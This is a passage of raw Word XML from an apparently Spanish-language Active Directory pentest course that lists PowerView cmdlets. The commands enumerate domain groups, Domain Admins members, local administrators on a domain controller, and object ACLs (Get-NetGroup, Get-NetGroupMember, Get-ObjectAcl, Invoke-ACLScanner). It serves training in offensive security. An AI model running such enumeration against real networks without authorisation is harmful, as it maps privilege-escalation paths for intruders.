                    <w:p w14:paraId="2F99DC35" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="313"/>
                        <w:ind w:left="62"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>NetComputer</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>–</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>OperatingSystem</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> </w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>"</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:color w:val="EC7C30"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>Windows Server 2016 Standard</w:t>
                      </w:r>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:b/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-12"/>
                          <w:sz w:val="48"/>
                        </w:rPr>
                        <w:t>"</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="545FC711" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="680" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7964B775" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1300"/>
        </w:tabs>
        <w:spacing w:before="51"/>
        <w:ind w:left="1300" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumere todos los grupos de dominios en el dominio actual:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DEED01" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E370F9D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="115EC21F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="13"/>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86656" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="319A4F9B" wp14:editId="07ECC880">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>2673095</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>184102</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7329170" cy="1679575"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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9170" cy="1679575"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="23951E69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="173"/>
                              <w:ind w:left="506" w:right="717"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>NetGroup</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="2ABC5CD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="721" w:right="215"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t>Get-</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t>NetGroup</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t xml:space="preserve"> –</w:t>
                            </w:r>
                            <w:proofErr w:type="spellStart"/>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t>FullData</w:t>
                            </w:r>
                            <w:proofErr w:type="spellEnd"/>
                          </w:p>
                          <w:p w14:paraId="17417A05" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="312"/>
                              <w:ind w:left="506" w:right="721"/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-4"/>
                              </w:rPr>
                              <w:t>Get-NetGroup –Dominio cyberwarfare.corp</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="319A4F9B" id="Textbox 491" o:spid="_x0000_s1253" type="#_x0000_t202" style="position:absolute;margin-left:210.5pt;margin-top:14.5pt;width:577.1pt;height:132.25pt;z-index:-1562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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="23951E69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="173"/>
                        <w:ind w:left="506" w:right="717"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>NetGroup</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2ABC5CD1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="721" w:right="215"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t>Get-</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t>NetGroup</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> –</w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t>FullData</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="17417A05" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="312"/>
                        <w:ind w:left="506" w:right="721"/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-4"/>
                        </w:rPr>
                        <w:t>Get-NetGroup –Dominio cyberwarfare.corp</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49C8B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="409"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A53FA9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1301"/>
        </w:tabs>
        <w:spacing w:line="211" w:lineRule="auto"/>
        <w:ind w:left="1301" w:right="2175" w:hanging="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Enumere los miembros del grupo de dominio de privilegios y los miembros del grupo de administradores locales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56881EEB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F17061F" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="224"/>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87168" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="21D48C27" wp14:editId="721169BD">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1972055</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>317589</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="8842375" cy="1347470"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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2375" cy="1347470"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="116A332D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="263" w:line="376" w:lineRule="auto"/>
                              <w:ind w:left="1202" w:right="337" w:hanging="1080"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                              </w:rPr>
                              <w:t>Get-NetGroupMember –GroupName "Administradores de dominio" -verbose Get-NetLocalGroup –ComputerName DC-01 -ListGroups</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="21D48C27" id="Textbox 492" o:spid="_x0000_s1254" type="#_x0000_t202" style="position:absolute;margin-left:155.3pt;margin-top:25pt;width:696.25pt;height:106.1pt;z-index:-15629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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="116A332D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="263" w:line="376" w:lineRule="auto"/>
                        <w:ind w:left="1202" w:right="337" w:hanging="1080"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                        </w:rPr>
                        <w:t>Get-NetGroupMember –GroupName "Administradores de dominio" -verbose Get-NetLocalGroup –ComputerName DC-01 -ListGroups</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152AA8D" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="460" w:right="0" w:bottom="580" w:left="0" w:header="0" w:footer="399" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0B65D485" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1204"/>
        </w:tabs>
        <w:spacing w:before="50"/>
        <w:ind w:left="1204" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Enumeración de ACL, obtenga las ACL asociadas con una entidad:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C969801" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18524637" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="184"/>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87680" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="211272FF" wp14:editId="5BD25383">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>1653539</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>292558</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="9314815" cy="838200"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4815" cy="838200"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="74031438" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="262"/>
                              <w:ind w:left="273"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-8"/>
                              </w:rPr>
                              <w:t>Get-ObjectAcl -SamAccountName &lt;Domain_User&gt; –ResolveGUIDs</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="211272FF" id="Textbox 493" o:spid="_x0000_s1255" type="#_x0000_t202" style="position:absolute;margin-left:130.2pt;margin-top:23.05pt;width:733.45pt;height:66pt;z-index:-1562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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="74031438" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="262"/>
                        <w:ind w:left="273"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                          <w:color w:val="2E5496"/>
                          <w:spacing w:val="-8"/>
                        </w:rPr>
                        <w:t>Get-ObjectAcl -SamAccountName &lt;Domain_User&gt; –ResolveGUIDs</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="275C7C61" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1204"/>
        </w:tabs>
        <w:spacing w:before="524"/>
        <w:ind w:left="1204" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Escaneo ACL único e interesante:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221C6B42" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374B8A89" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="680E6F27" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="21"/>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88192" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2EDAAF3E" wp14:editId="1681B185">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3776471</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>189091</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5614670" cy="745490"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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4670" cy="745490"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:ln w="9525">
                          <a:solidFill>
                            <a:srgbClr val="EC7C30"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="66301D24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:pStyle w:val="Textoindependiente"/>
                              <w:spacing w:before="263"/>
                              <w:ind w:left="241"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                                <w:color w:val="2E5496"/>
                                <w:spacing w:val="-2"/>
                              </w:rPr>
                              <w:t>Invoke-ACLScanner –ResolveGUIDs</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="2EDAAF3E" id="Textbox 494" o:spid="_x0000_s1256" type="#_x0000_t202" style="position:absolute;margin-left:297.35pt;margin-top:14.9pt;width:442.1pt;height:58.7pt;z-index:-15628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" filled="f" strokecolor="#ec7c30">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="66301D24" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:pStyle w:val="Textoindependiente"/>
                        <w:spacing w:before="263"/>
                        <w:ind w:left="241"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
